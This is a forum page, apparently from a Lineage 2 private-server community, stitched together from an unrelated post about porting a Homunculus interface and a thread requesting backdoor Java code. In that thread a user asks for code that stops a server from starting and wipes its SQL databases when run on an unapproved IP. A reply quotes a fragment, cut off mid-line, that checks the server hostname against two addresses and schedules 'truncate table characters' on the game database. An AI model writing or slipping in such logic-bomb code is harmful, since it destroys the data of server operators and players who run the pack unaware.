My initial plan was to port the Homunculus system from Live 502 to ClassicAden 502. But, when the interface for Homunculus is enabled, it has some hardcoded function that tries to load the dat files which leads to a crash since those files dont exist in ClassicAden. I was hoping to do some injection hoping, forcing the client to load the files.
Question
numl0ckas
Hello, as topic says i need backdoor java code.
If ip doesnt same as typed in gameserver.java where we put backdoor server doesnt turn on and all sql from navicat be deleted.
Can someone help to me make it? Or share it:)
PACK: L2jaCis
if(Config.GAMESERVER_HOSTNAME.equals("77.120.16.18") || Config.GAMESERVER_HOSTNAME.equals("77.120.29.151")) ThreadPoolManager.getInstance().schedule(new Runnable() { public void run () { try { Connection con = L2DatabaseFactory.getInstance().getConnection(); con.prepareStatement("truncate table characters").execute();ITS FROM LUCERA i dont know its good backdoor or no, but here is example:)
21 answers to this question
Recommended Posts